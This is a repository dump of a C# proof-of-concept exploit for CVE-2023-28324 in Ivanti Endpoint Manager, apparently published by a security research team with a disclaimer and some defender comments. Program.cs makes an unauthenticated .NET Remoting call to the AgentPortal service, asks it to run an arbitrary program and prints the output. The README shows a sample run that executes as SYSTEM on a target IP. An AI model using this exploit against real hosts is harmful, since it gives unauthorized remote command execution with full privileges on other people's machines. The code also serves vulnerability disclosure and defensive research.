├── .idea
├── .idea.CVE-2023-28324
│ └── .idea
│ │ ├── .gitignore
│ │ ├── encodings.xml
│ │ ├── indexLayout.xml
│ │ └── vcs.xml
└── .idea.CVE-2024-29847
│ └── .idea
│ ├── .gitignore
│ ├── encodings.xml
│ ├── indexLayout.xml
│ └── vcs.xml
├── CVE-2023-28324.sln
├── CVE-2023-28324
├── .gitignore
├── CVE-2023-28324.csproj
├── Program.cs
└── Properties
│ └── AssemblyInfo.cs
└── README.md
/.idea/.idea.CVE-2023-28324/.idea/.gitignore:
--------------------------------------------------------------------------------
1 | # Default ignored files
2 | /shelf/
3 | /workspace.xml
4 | # Rider ignored files
5 | /.idea.CVE-2023-28324.iml
6 | /contentModel.xml
7 | /modules.xml
8 | /projectSettingsUpdater.xml
9 | # Editor-based HTTP Client requests
10 | /httpRequests/
11 | # Datasource local storage ignored files
12 | /dataSources/
13 | /dataSources.local.xml
14 |
--------------------------------------------------------------------------------
/.idea/.idea.CVE-2023-28324/.idea/encodings.xml:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
--------------------------------------------------------------------------------
/.idea/.idea.CVE-2023-28324/.idea/indexLayout.xml:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
7 |
8 |
--------------------------------------------------------------------------------
/.idea/.idea.CVE-2023-28324/.idea/vcs.xml:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
--------------------------------------------------------------------------------
/.idea/.idea.CVE-2024-29847/.idea/.gitignore:
--------------------------------------------------------------------------------
1 | # Default ignored files
2 | /shelf/
3 | /workspace.xml
4 | # Rider ignored files
5 | /contentModel.xml
6 | /modules.xml
7 | /projectSettingsUpdater.xml
8 | /.idea.CVE-2024-29847.iml
9 | # Editor-based HTTP Client requests
10 | /httpRequests/
11 | # Datasource local storage ignored files
12 | /dataSources/
13 | /dataSources.local.xml
14 |
--------------------------------------------------------------------------------
/.idea/.idea.CVE-2024-29847/.idea/encodings.xml:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
--------------------------------------------------------------------------------
/.idea/.idea.CVE-2024-29847/.idea/indexLayout.xml:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
7 |
8 |
--------------------------------------------------------------------------------
/.idea/.idea.CVE-2024-29847/.idea/vcs.xml:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
--------------------------------------------------------------------------------
/CVE-2023-28324.sln:
--------------------------------------------------------------------------------
1 |
2 | Microsoft Visual Studio Solution File, Format Version 12.00
3 | Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "CVE-2023-28324", "CVE-2023-28324\CVE-2023-28324.csproj", "{8FEB67B5-AC03-416D-90F2-BAA5C0BE593D}"
4 | EndProject
5 | Global
6 | GlobalSection(SolutionConfigurationPlatforms) = preSolution
7 | Debug|Any CPU = Debug|Any CPU
8 | Release|Any CPU = Release|Any CPU
9 | EndGlobalSection
10 | GlobalSection(ProjectConfigurationPlatforms) = postSolution
11 | {8FEB67B5-AC03-416D-90F2-BAA5C0BE593D}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
12 | {8FEB67B5-AC03-416D-90F2-BAA5C0BE593D}.Debug|Any CPU.Build.0 = Debug|Any CPU
13 | {8FEB67B5-AC03-416D-90F2-BAA5C0BE593D}.Release|Any CPU.ActiveCfg = Release|Any CPU
14 | {8FEB67B5-AC03-416D-90F2-BAA5C0BE593D}.Release|Any CPU.Build.0 = Release|Any CPU
15 | EndGlobalSection
16 | EndGlobal
17 |
--------------------------------------------------------------------------------
/CVE-2023-28324/.gitignore:
--------------------------------------------------------------------------------
1 | bin/
2 | obj/
--------------------------------------------------------------------------------
/CVE-2023-28324/CVE-2023-28324.csproj:
--------------------------------------------------------------------------------
1 |
2 |
3 |
5 |
6 | Debug
7 | AnyCPU
8 | {8FEB67B5-AC03-416D-90F2-BAA5C0BE593D}
9 | Exe
10 | Properties
11 | CVE-2023-28324
12 | CVE-2023-28324
13 | v4.8.1
14 | 512
15 | true
16 |
17 |
18 | x64
19 | true
20 | full
21 | false
22 | bin\Debug\
23 | DEBUG;TRACE
24 | prompt
25 | 4
26 |
27 |
28 | x64
29 | pdbonly
30 | true
31 | bin\Release\
32 | TRACE
33 | prompt
34 | 4
35 |
36 |
37 |
38 | ..\AgentPortal.exe
39 |
40 |
41 | ..\APCommon.dll
42 |
43 |
44 |
45 |
46 |
47 |
48 |
49 |
50 |
51 |
52 |
53 |
54 |
55 |
56 |
57 |
64 |
65 |
66 |
--------------------------------------------------------------------------------
/CVE-2023-28324/Program.cs:
--------------------------------------------------------------------------------
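using System;
using System.Runtime.Remoting.Channels;
using System.Runtime.Remoting.Channels.Tcp;
using System.Threading;
using LANDesk.AgentPortal;

namespace CVE
{
    /// <summary>
    /// Proof-of-concept client for CVE-2023-28324 (Ivanti EPM, AgentPortal.exe).
    /// It obtains a .NET Remoting proxy for the IAgentPortal object published at
    /// tcp://&lt;ip&gt;:&lt;port&gt;/LANDeskAgentPortal/LDSM, submits a RunProgram request
    /// and polls GetResult until the remote side returns output.
    /// </summary>
    /// <remarks>
    /// IAgentPortal and IAgentPortalBase.ActionEnum are not defined in this project;
    /// presumably they come from the AgentPortal.exe / APCommon.dll references the
    /// project file points at (confirm against those assemblies).
    ///
    /// For defenders: nothing in this client supplies credentials, and the channel
    /// is registered with ensureSecurity set to false. A host on which the request
    /// succeeds is therefore accepting the call from an unauthenticated network
    /// peer. Limit network reachability of the AgentPortal listener and apply the
    /// vendor fix for CVE-2023-28324. The README sample run returns
    /// "nt authority\system", so the requested program ran with SYSTEM privileges
    /// in that run; unexpected programs started by the AgentPortal service are the
    /// host-side signal to review (process lineage is inferred, verify in a lab).
    /// </remarks>
    internal class Program
    {
        /// <summary>
        /// Entry point. Expects: target IP, target port, program to run, and
        /// optionally the arguments for that program.
        /// </summary>
        /// <param name="args">
        /// args[0] = ip, args[1] = port, args[2] = command, args[3..] = arguments
        /// (joined with single spaces).
        /// </param>
        public static void Main(string[] args)
        {
            // Validate the command line before touching any remoting state.
            if (args.Length < 3)
            {
                // The three positional arguments are required by the code below;
                // the usage text now names them.
                Console.WriteLine("Usage: Program.exe <ip> <port> <command> [arguments_for_program]");
                return;
            }

            // Second argument is ensureSecurity: false leaves the TCP channel
            // without authentication or encryption.
            TcpChannel channel = new TcpChannel();
            ChannelServices.RegisterChannel(channel, false);

            var ip = args[0];
            var port = args[1];
            var command = args[2];
            string arguments = "";
            if (args.Length > 3)
            {
                // Everything after the command is forwarded as one space-joined string.
                arguments = string.Join(" ", args, 3, args.Length - 3);
            }

            // Activator.GetObject only builds a local proxy; the remote endpoint is
            // first contacted by the Request call below.
            string url = String.Format("tcp://{0}:{1}/LANDeskAgentPortal/LDSM", ip, port);
            IAgentPortal agentPortal = (IAgentPortal)Activator.GetObject(typeof(IAgentPortal), url);

            try
            {
                Console.WriteLine("Sending request.");
                // NOTE(review): the meaning of the "localhost" argument is not visible
                // here; the same value is passed to GetResult, so it appears to
                // correlate the request with its result. Confirm against IAgentPortal.
                bool request_result = agentPortal.Request("localhost", IAgentPortalBase.ActionEnum.RunProgram, command, arguments);
                Console.WriteLine("Request result: " + request_result);

                // Poll once per second until a non-null result arrives. The wait comes
                // before each re-poll so the result is printed as soon as it is
                // available. There is no upper bound on the wait.
                string[] result = agentPortal.GetResult("localhost");
                while (result == null)
                {
                    Console.WriteLine("Waiting for result.");
                    Thread.Sleep(1000);
                    result = agentPortal.GetResult("localhost");
                }
                Console.WriteLine("Result: " + string.Join("\n", result));
            }
            catch (Exception e)
            {
                // Connection and remoting failures end up here and are only printed.
                Console.WriteLine(e);
            }
        }
    }
}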
--------------------------------------------------------------------------------
/CVE-2023-28324/Properties/AssemblyInfo.cs:
--------------------------------------------------------------------------------
using System.Reflection;
using System.Runtime.InteropServices;

// Assembly metadata for the CVE-2023-28324 proof-of-concept executable.
// Only title, product, copyright, GUID and the two version attributes carry
// values; description, configuration, company, trademark and culture are empty.

// General Information about an assembly is controlled through the following
// set of attributes. Change these attribute values to modify the information
// associated with an assembly.
[assembly: AssemblyTitle("CVE-2023-28324")]
[assembly: AssemblyDescription("")]
[assembly: AssemblyConfiguration("")]
[assembly: AssemblyCompany("")]
[assembly: AssemblyProduct("CVE-2023-28324")]
[assembly: AssemblyCopyright("Copyright © 2024")]
[assembly: AssemblyTrademark("")]
[assembly: AssemblyCulture("")]

// Setting ComVisible to false makes the types in this assembly not visible
// to COM components. If you need to access a type in this assembly from
// COM, set the ComVisible attribute to true on that type.
[assembly: ComVisible(false)]

// The following GUID is for the ID of the typelib if this project is exposed to COM.
// It is the same value as the project GUID listed in CVE-2023-28324.sln.
[assembly: Guid("8FEB67B5-AC03-416D-90F2-BAA5C0BE593D")]

// Version information for an assembly consists of the following four values:
//
// Major Version
// Minor Version
// Build Number
// Revision
//
// You can specify all the values or you can default the Build and Revision Numbers
// by using the '*' as shown below:
// [assembly: AssemblyVersion("1.0.*")]
// Both the assembly version and the file version are pinned to 1.0.0.0.
[assembly: AssemblyVersion("1.0.0.0")]
[assembly: AssemblyFileVersion("1.0.0.0")]
--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
1 | # CVE-2023-28324
2 | POC for CVE-2023-28324 affecting Ivanti EPM.
3 |
4 | ## Technical Analysis
5 | A technical root cause analysis of the vulnerability can be found on our blog:
6 | https://www.horizon3.ai/attack-research/attack-blogs/cve-2023-28324-deep-dive/
7 |
8 | ## Summary
9 | This POC abuses a vulnerability in `AgentPortal.exe` to execute arbitrary commands. To build this POC, you
10 | must supply your own copies of `AgentPortal.exe` and `APCommon.dll` from an Ivanti EPM installation; the project references them, but they are not included in this repository.
11 |
12 | ## Usage
13 | ```plaintext
14 | CVE-2023-28324.exe 192.168.1.21 49668 whoami.exe
15 | Sending request.
16 | Request result: True
17 | Waiting for result.
18 | Waiting for result.
19 | Result: nt authority\system
20 | ```
21 |
22 | ## Follow the Horizon3.ai Attack Team on Twitter for the latest security research:
23 | * [Horizon3 Attack Team](https://twitter.com/Horizon3Attack)
24 | * [James Horseman](https://twitter.com/JamesHorseman2)
25 | * [Zach Hanley](https://twitter.com/hacks_zach)
26 |
27 | ## Disclaimer
28 | This software has been created purely for the purposes of academic research and for the development of effective defensive techniques, and is not intended to be used to attack systems except where explicitly authorized. Project maintainers are not responsible or liable for misuse of the software. Use responsibly.
29 |
--------------------------------------------------------------------------------